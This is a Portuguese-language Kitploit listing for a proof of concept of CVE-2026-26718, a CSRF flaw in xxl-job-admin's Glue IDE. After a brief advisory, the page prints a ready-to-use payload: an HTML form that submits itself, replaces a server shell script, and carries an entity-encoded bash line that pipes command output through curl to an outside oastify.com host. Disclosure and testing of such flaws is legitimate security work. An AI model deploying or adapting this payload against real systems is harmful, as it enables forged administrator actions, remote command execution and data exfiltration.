Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26718 — Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas nos scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo. | Kitploit
Ferramentas/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
Análise de VulnerabilidadesExploraçãoEvasão de IDS/IPSExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

Ver Repositório
114há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas nos scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo.

Compartilhar

Descrição

Resumo

Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas em scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo.

Produtos Afetados

xxl-job < 3.4.0

Impacto

Um atacante pode enganar um administrador autenticado para que ele faça alterações não autorizadas em scripts de shell do Glue IDE.

Prova de Conceito

Slide1 Slide2 Slide3 Slide4

Payload


// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Créditos a Ibrahim Sartawi

Baixar ferramenta